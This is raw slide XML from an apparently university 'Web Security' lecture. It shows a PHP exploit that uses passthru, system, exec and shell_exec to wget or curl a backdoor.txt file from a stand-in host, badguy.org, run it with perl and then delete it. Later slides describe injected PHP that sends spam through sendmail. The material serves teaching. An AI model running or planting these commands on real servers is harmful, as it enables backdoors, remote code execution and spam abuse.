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62" r:id="rId5"/>
    <p:sldId id="263" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="269" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="260" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="267" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="286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7" r:id="rId31"/>
    <p:sldId id="271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690" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="108" d="100"/>
          <a:sy n="108" d="100"/>
        </p:scale>
        <p:origin x="-3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6" d="100"/>
        <a:sy n="76" d="100"/>
      </p:scale>
      <p:origin x="0" y="20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74601-3C15-C849-934A-D3B51362CB3A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/4/16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E5B1D-BE54-7545-ABE7-B8CCFC976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55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CA864-7BE4-664F-B69A-F275AE58EDDE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/4/16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D1ED8-3C9F-0749-91CF-4C82F25CE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7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16556-F221-6B4A-941B-C4D5E89A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7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8CDB4-73E0-F449-8197-52C89BA2D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1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DF34A-A5BC-3C4A-95B7-3236D14BB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95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D3503-C020-CD4B-BF6D-3DAB6B076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74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2F09D-1D5D-E640-9131-07ADF02E5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5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923BF-0F1B-BD4D-9C7C-B519A1AF0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7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F3FB7-4444-5641-9266-5DEED5BD2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8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59828-B2EB-2A4C-A94D-BEA8D363E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3A76C-7820-154F-80CA-E04A29777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79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906BB-6978-DD4D-8858-DAC14037C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65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43C49-99BB-A24A-B791-488380824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81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39D57118-4C32-8A46-AAC1-B8BB30280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/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Comic Sans M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omic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans M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omic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans M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omic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans M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omic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans M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mic Sans MS"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Comic Sans M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howtoubuntu.org/how-to-install-lamp-on-ubuntu" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Comic Sans MS" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Web Security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omic Sans MS" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Chien-Chung Shen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>cshen@udel.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0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PHP Exploit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1000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>passthru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(’cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp;wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>badguy.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/ data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>*’); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>passthru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(’cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp;curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -O http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>badguy.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> /data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>*’); system(’cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp;wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>badguy.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>*’); system(’cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp;curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -O http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>badguy.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>*’); exec(’cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp;wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>badguy.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/ data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>*’); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>exec(’cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp;curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -O http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>badguy.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/ data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>*’); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(’cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp;wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>badguy.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>*’); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(’cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp;curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -O http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>badguy.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt;rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>*’); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>is trying for the server to download from some third party a file called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>backdoor.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> that presumably contains malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/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malicious code could open an IRC channel for command and control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226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PHP Exploit to Spew </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>ut Spam (1)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Unethical provider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>of web hosting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>services </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>wants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to inject some PHP code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>pages uploaded to his server by unsuspecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>He </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>knows that the injected PHP code will NOT be visible to a client even when the client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>views the page source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>in his/her browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>because, by design, PHP is parsed out before it is sent to a browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. So, to the client, the web page will look exactly like it was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>uploaded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>spam file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to be quietly downloaded from a third-party spam mail provider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>whenever a client page is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>viewed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the spam file consists of the email addresses and the content for each email address in the form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>commands to an output stream that talks to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> program running on the server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="20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19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PHP Exploit to Spew </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>ut Spam (2)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Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Web Hosting Service Provider: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>IP: 128.4.129.205</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>OS: Ubuntu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Web server: Apache2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
